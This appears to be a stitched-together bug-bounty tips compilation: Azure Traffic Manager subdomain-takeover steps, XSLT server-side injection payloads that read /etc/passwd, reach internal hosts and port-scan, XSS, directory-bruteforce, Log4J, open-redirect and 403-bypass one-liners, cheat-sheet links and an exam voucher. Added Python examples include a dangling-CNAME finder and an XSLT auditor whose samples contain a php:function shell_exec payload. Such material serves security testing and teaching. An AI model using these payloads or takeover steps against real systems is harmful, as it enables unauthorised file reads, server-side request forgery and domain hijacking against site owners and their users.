Load Balancer Takeover
Step 1: Identify .trafficmanager.net subdomains.
Step 2: Use your Azure subscription to access the Traffic Manager profile.
Step 3: Create a resource with the vulnerable *.trafficmanager.net CNAME.
Step 4: Add an endpoint for redirection to your desired site.
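Added example (my own code, not from the post above): Step 1 is the part worth automating. The check below parses dig/zone-style CNAME lines, keeps only targets of the form <profile>.trafficmanager.net, and flags the ones that no longer resolve; a Traffic Manager name that returns NXDOMAIN has been released by Azure and can be re-created from any subscription, which is what Steps 2-4 rely on. The zone lines, host names and the `fake_resolver` are constructed so it runs offline; `live_resolver` is the real lookup.

```python
"""Dangling Traffic Manager CNAME check (added example, not the original post's code)."""
import re
import socket
from typing import Callable

TM_SUFFIX = ".trafficmanager.net"

# "<name> [ttl] [IN] CNAME <target>" as printed by dig or dumped from a zone file
CNAME_RE = re.compile(r"^(\S+)\s+(?:\d+\s+)?(?:IN\s+)?CNAME\s+(\S+)\s*$", re.IGNORECASE)


def parse_cnames(lines: list[str]) -> dict[str, str]:
    """Map owner name -> CNAME target, both lower-cased without the trailing dot."""
    records: dict[str, str] = {}
    for line in lines:
        m = CNAME_RE.match(line.strip())
        if m:
            records[m.group(1).rstrip(".").lower()] = m.group(2).rstrip(".").lower()
    return records


def is_traffic_manager_profile(target: str) -> bool:
    """True only for <profile>.trafficmanager.net (one label in front of the suffix)."""
    t = target.rstrip(".").lower()
    return t.endswith(TM_SUFFIX) and t.count(".") == 2


def find_dangling(records: dict[str, str],
                  resolves: Callable[[str], bool]) -> list[tuple[str, str]]:
    """Return (owner, target) pairs whose Traffic Manager target no longer resolves."""
    return [(owner, target) for owner, target in records.items()
            if is_traffic_manager_profile(target) and not resolves(target)]


def live_resolver(name: str) -> bool:
    """Real lookup: a resolution failure (NXDOMAIN) counts as 'does not resolve'.
    Use a resolver that does not rewrite NXDOMAIN, or dangling targets are hidden."""
    try:
        socket.getaddrinfo(name, None)
        return True
    except socket.gaierror:
        return False


# Constructed sample zone output (assumed names; nothing here is a real finding).
SAMPLE_ZONE = [
    "cdn.example.com.      300 IN CNAME example-prod.trafficmanager.net.",
    "old-api.example.com.  300 IN CNAME example-legacy.trafficmanager.net.",
    "www.example.com.      300 IN CNAME example.azureedge.net.",
    "blog.example.com.     300 IN CNAME example-blog.trafficmanager.net.",
    "mail.example.com.     300 IN MX 10 mail.example.com.",
]
# Profiles that, in this constructed world, still exist in Azure DNS.
LIVE_PROFILES = {"example-prod.trafficmanager.net", "example-blog.trafficmanager.net"}


def fake_resolver(name: str) -> bool:
    """Offline stand-in for live_resolver."""
    return name.rstrip(".").lower() in LIVE_PROFILES


if __name__ == "__main__":
    for owner, target in find_dangling(parse_cnames(SAMPLE_ZONE), fake_resolver):
        print(f"takeover candidate: {owner} -> {target} (NXDOMAIN)")
```

Swap `fake_resolver` for `live_resolver` to run it against real output of `dig +noall +answer CNAME <host>`; a hit only confirms the name is unclaimed, not that you are authorised to claim it.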
XSLT Server Side Injection
(Extensible Stylesheet Language Transformations) - Part 1
The most used frameworks are: Libxslt (Gnome), Xalan (Apache) and Saxon (Saxonica).
1. Read Local File: read.xsl
<!-- unparsed-text() is an XSLT 2.0 function: works in Saxon, not in libxslt or Xalan (XSLT 1.0) -->
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:abc="http://php.net/xsl" version="1.0">
<xsl:template match="/">
<xsl:value-of select="unparsed-text('/etc/passwd', 'utf-8')"/>
</xsl:template>
</xsl:stylesheet>
2. SSRF
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:abc="http://php.net/xsl" version="1.0">
<!-- the processor fetches the included stylesheet from the internal host before transforming -->
<xsl:include href="http://127.0.0.1:8000/xslt"/>
<xsl:template match="/">
</xsl:template>
</xsl:stylesheet>
OR
<!-- ESI variant: the edge/cache fetches both the data and the stylesheet from the internal host -->
<esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10/news_template.xsl">
</esi:include>
3. Javascript Injection
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
<xsl:template match="/">
<!-- the literal <script> is copied into the result tree and runs if the output is rendered as HTML -->
<script>confirm("We're good");</script>
</xsl:template>
</xsl:stylesheet>
4. Port Scan
<?xml version="1.0" encoding="utf-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
<xsl:template match="/">
<!-- document() opens a connection to host:port; the error text and response time differ for open and closed ports -->
<xsl:value-of select="document('http://example.com:22')"/>
</xsl:template>
</xsl:stylesheet>
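Added example (my own code, not from the post above and not part of any XSLT library): a static pre-check an application can run on a user-supplied stylesheet before handing it to the processor. It uses only the standard library and reports the constructs behind the four payloads above: unparsed-text()/document() reads, xsl:include or xsl:import of a remote href, a literal <script> in the result tree, and, one step past the post, calls through the PHP extension namespace the payloads declare (php:function). The sample stylesheets are constructed here with the correct XSLT namespace URI.

```python
"""Static audit of an XSLT stylesheet for file/network/extension access (added example)."""
import re
import xml.etree.ElementTree as ET

XSL_NS = "http://www.w3.org/1999/XSL/Transform"
PHP_NS = "http://php.net/xsl"

# XPath/XSLT functions that read files or URLs rather than the input document
RISKY_FUNCS = re.compile(r"\b(document|unparsed-text|unparsed-text-lines|doc|collection)\s*\(")


def _local(tag: str) -> str:
    """'{namespace}name' -> 'name'."""
    return tag.rsplit("}", 1)[-1]


def audit_stylesheet(xsl_text: str) -> list[str]:
    """Return findings for a stylesheet; an empty list means nothing suspicious was seen."""
    findings: list[str] = []
    try:
        root = ET.fromstring(xsl_text)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]

    # A wrong namespace URI (e.g. https://w3.org/...) makes processors ignore the sheet entirely.
    if root.tag not in (f"{{{XSL_NS}}}stylesheet", f"{{{XSL_NS}}}transform"):
        findings.append("root is not xsl:stylesheet in the XSLT namespace")

    # Prefixes bound to the PHP extension namespace, e.g. xmlns:php="http://php.net/xsl"
    prefixes = re.findall(r'xmlns:([\w.-]+)="%s"' % re.escape(PHP_NS), xsl_text)
    php_call = (re.compile(r"\b(?:%s):function(?:String)?\s*\(" % "|".join(map(re.escape, prefixes)))
                if prefixes else None)

    for el in root.iter():
        name = _local(el.tag)
        if name in ("include", "import"):
            findings.append(f"xsl:{name} href={el.get('href')!r} (remote stylesheet / SSRF)")
        if name == "script":
            findings.append("literal <script> in output (XSS if the result is rendered)")
        for attr, value in el.attrib.items():  # select=, test=, match=, href= ...
            m = RISKY_FUNCS.search(value)
            if m:
                findings.append(f"{m.group(1)}() in {attr}={value!r} (file/network read)")
            if php_call and php_call.search(value):
                findings.append(f"PHP extension call in {attr}={value!r} (code execution)")
    return findings


# Constructed samples mirroring the payloads above (namespace URIs corrected).
HEAD = '<xsl:stylesheet xmlns:xsl="%s" xmlns:php="%s" version="1.0">' % (XSL_NS, PHP_NS)
READ_FILE = HEAD + """<xsl:template match="/">
<xsl:value-of select="unparsed-text('/etc/passwd', 'utf-8')"/></xsl:template></xsl:stylesheet>"""
SSRF = HEAD + """<xsl:include href="http://127.0.0.1:8000/xslt"/>
<xsl:template match="/"/></xsl:stylesheet>"""
JS_INJECT = HEAD + """<xsl:template match="/"><script>confirm("We're good");</script>
</xsl:template></xsl:stylesheet>"""
PORT_SCAN = HEAD + """<xsl:template match="/">
<xsl:value-of select="document('http://example.com:22')"/></xsl:template></xsl:stylesheet>"""
PHP_RCE = HEAD + """<xsl:template match="/">
<xsl:value-of select="php:function('shell_exec', 'id')"/></xsl:template></xsl:stylesheet>"""
BENIGN = HEAD + """<xsl:template match="/"><h1><xsl:value-of select="/doc/title"/></h1>
</xsl:template></xsl:stylesheet>"""
WRONG_NS = READ_FILE.replace(XSL_NS, "https://w3.org/1999/XSL/Transform")

if __name__ == "__main__":
    for label, sheet in [("read", READ_FILE), ("ssrf", SSRF), ("js", JS_INJECT),
                         ("portscan", PORT_SCAN), ("php", PHP_RCE), ("benign", BENIGN)]:
        print(label, audit_stylesheet(sheet) or "clean")
```

A pattern match is a pre-filter, not a sandbox: the durable fix is to turn the capabilities off in the processor itself (in PHP, `XSLTProcessor::setSecurityPrefs()` with `XSL_SECPREF_READ_FILE | XSL_SECPREF_READ_NETWORK` on top of the defaults, and never calling `registerPHPFunctions()` on untrusted input).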
Find JS Endpoints With 1-Click
1. Add a Blank Bookmark on your browser.
2. Add this Regex (https://0-a.nl/jsendpoints.txt) in the URL section.
3. Now open any site and click on your bookmark!
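Added example (my own code; the regex below is my own assumption and is not the one served at https://0-a.nl/jsendpoints.txt that the post links to): the same idea as the bookmarklet, run over a script body instead of a live page. It picks out quoted absolute URLs, root-relative and relative paths, and bare file names with web extensions, the way LinkFinder-style tools do. SAMPLE_JS is a constructed snippet so it runs offline.

```python
"""Extract endpoint-looking strings from JavaScript (added example, own regex)."""
import re

ENDPOINT_RE = re.compile(r"""
    (?P<q>["'`])                                        # opening quote or backtick
    (?P<path>
        (?:https?:)?//[^"'`\s]{3,}                      # absolute or protocol-relative URL
      | /(?!/)[A-Za-z0-9_./~${}-]*[A-Za-z0-9_/~${}-]    # root-relative path, e.g. /api/v1/users
            (?:\?[^"'`\s]*)?                            #   optional query string
      | (?:\.\.?/)+[A-Za-z0-9_./~${}-]+                 # relative path, e.g. ./lib/util.js
      | [A-Za-z0-9_.-]+\.(?:json|js|php|aspx?|jsp|html?) # bare file name, e.g. config.json
            (?:\?[^"'`\s]*)?
    )
    (?P=q)                                              # same closing quote
""", re.VERBOSE)


def extract_endpoints(js: str) -> list[str]:
    """Unique endpoint strings in order of first appearance."""
    seen: dict[str, None] = {}
    for m in ENDPOINT_RE.finditer(js):
        seen.setdefault(m.group("path"), None)
    return list(seen)


# Constructed JavaScript sample (assumed host names and paths).
SAMPLE_JS = r'''
const API = "https://api.example.com/v1";
fetch(API + "/users/" + userId, {headers: {"Content-Type": "application/json"}});
fetch(`/api/${userId}/items?limit=10`).then(r => r.json());
axios.post('/auth/login', creds);
import util from "./lib/util.js";
const legacy = "//cdn.example.com/legacy.js";
const banner = "hello world", cfg = "config.json";
'''

if __name__ == "__main__":
    for endpoint in extract_endpoints(SAMPLE_JS):
        print(endpoint)
```

Strings such as "application/json" or "hello world" are deliberately not matched; on minified bundles expect some noise from string constants that happen to look like paths, so review the output rather than feeding it straight into a scanner.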
Remote Code Execution via Local File Inclusion POC by Abhishek Morla
XSS Checks Made Easy
Example: Execute XSS checks on a list of URLs with a single command.
One-Liner: cat urls.txt | dalfox pipe --multicast -o xss.txt
Uncover Hidden Parameters in Seconds
Example: Extract hidden parameters from URLs effortlessly.
One-Liner:
cat alive.txt | rush 'curl -skL "{}" | grep "type=\"hidden\"" | grep -Eo "name=\"[^\"]+\"" | cut -d "\"" -f2 | sort -u' | anew params.txt
Reveal Secrets in JavaScript Files
Example: Identify sensitive data in JavaScript files like a pro.
One-Liner:
cat alive.txt | rush 'hakrawler -plain -js -depth 2 -url {}' | rush 'python3 /root/Tools/SecretFinder/SecretFinder.py -i {} -o cli' | anew secretfinder
Crush Directories with Effortless Bruteforce
Example: Discover hidden directories and files effortlessly.
One-Liner:
cat alive.txt | xargs -I@ sh -c 'ffuf -c -w /path/to/wordlist -D -e php,aspx,html,do,ashx -u @/FUZZ -ac -t 200' | tee -a dir-ffuf.txt
Expose Log4J Vulnerabilities with Ease
Example: Identify Log4J vulnerabilities on the fly.
One-Liner:
cat alive.txt | xargs -I@ sh -c 'python3 /path/to/log4j-scan.py -u @'
Hunt Down Sneaky Open Redirect
Example: Uncover open redirects like a seasoned hunter.
One-Liner:
# export LHOST=<your callback host> first: the inner sh -c reads $LHOST from the environment
gau https://vuln.target.com | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'
Capture Screenshots in a Snap
Example: Capture screenshots of live websites effortlessly.
One-Liner:
assetfinder -subs-only https://target.com | httpx -silent -timeout 50 | xargs -I@ sh -c 'gowitness single @'
Know Your WordPress Version
Example: Discover the WordPress version of a target website instantly.
One-Liner:
curl -s 'https://target.com/readme.html' | grep 'Version'
Unearth Subdomains Containing JavaScript
Example: Find subdomains with JavaScript files in a snap.
One-Liner:
echo "domain" | haktrails subdomains | httpx -silent | getJS --complete | anew JS
Bypass 403 Login Pages with Finesse
Example: Bypass 403 login pages like a pro.
One-Liner:
cat hosts.txt | httpx -path /login -p 80,443,8080,8443 -mc 401,403 -silent -t 300 | unfurl format %s://%d | httpx -path //login -mc 200 -t 300 -nc -silent
Fuzzing and Bypassing the AWS WAF to trigger XSS
Tool - https://lnkd.in/gk4-_4yw
Blog - https://lnkd.in/g4W7eA7R
Bug Bounty Checklist and Cheatsheets
WAPT-https://github.com/KathanP19/HowToHunt/blob/master/CheckList/Web_Checklist_by_Chintan_Gurjar.pdf
Authentication-https://github.com/HolyBugx/HolyTips/blob/main/Checklist/Authentication.pdf
Oauth Misconfiguration-https://binarybrotherhood.io/oauth2_threat_model.html
File Upload-https://github.com/HolyBugx/HolyTips/blob/main/Checklist/File%20Upload.pdf
IDOR-https://notion.so/IDOR-Attack-vectors-exploitation-bypasses-and-chains-0b73eb18e9b640ce8c337af83f397a6b
XSS-https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
SQLi-https://portswigger.net/web-security/sql-injection/cheat-sheet
XXE-https://link.medium.com/lprTDcXRYgb
SSRF-https://0xn3va.gitbook.io/cheat-sheets/web-application/server-side-request-forgery
2FA-https://drive.google.com/file/d/11FlzxlVw4GIZ60s5v3I1S5p8kXZHExFT/view
CORS-https://0xn3va.gitbook.io/cheat-sheets/web-application/cors-misconfiguration
Business Logic Flaws-https://link.medium.com/MX5hzfESYgb
CSRF-https://book.hacktricks.xyz/pentesting-web/csrf-cross-site-request-forgery
Insecure deserialization-https://thehackerish.com/insecure-deserialization-explained-with-examples/
Web Cache Poisoning-https://0xn3va.gitbook.io/cheat-sheets/web-application/web-cache-poisoning
HTTP request smuggling-https://portswigger.net/web-security/request-smuggling/finding
Command Injection-https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection
SAML-https://github.com/e11i0t4lders0n/SAML-SSO
Race Condition-https://pandaonair.com/2020/06/11/race-conditions-exploring-the-possibilities.html
S3 Bucket Misconfiguration-https://medium.com/@janijay007/s3-bucket-misconfiguration-from-basics-to-pawn-6893776d1007
Server-Side Template Injection-https://portswigger.net/research/server-side-template-injection
WebSockets Vulnerabilities-https://portswigger.net/web-security/websockets#intercepting-and-modifying-websocket-messages
Find Waybackurls JS Endpoints With 1-Click
1. Add a Blank Bookmark on your browser.
2. Add this Regex in the URL section:
javascript:(function() { var currentURL = encodeURIComponent(window.location.hostname.replace(/^www\./, '')); var newURL = 'https://web.archive.org/cdx/search/cdx?url=' + currentURL; window.open(newURL, '_blank'); })();
3. Now open any site and click on your bookmark!
FREE Exam Voucher ISC2 CC
Exam Voucher: CC1M12312024
Link: https://www.isc2.org/landing/1mcc
Subprober
Subprober is a powerful and efficient subdomain scanning tool
https://github.com/sanjai-AK47/Subprober